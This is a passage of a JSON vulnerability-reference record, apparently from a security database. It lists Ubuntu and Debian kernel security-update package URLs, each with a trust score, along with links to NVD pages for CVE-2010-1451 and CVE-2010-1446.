        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic-pae_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/bugs/589163"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc-smp_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-preempt_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-common_2.6.32-22.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-preempt_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1451"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1446"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
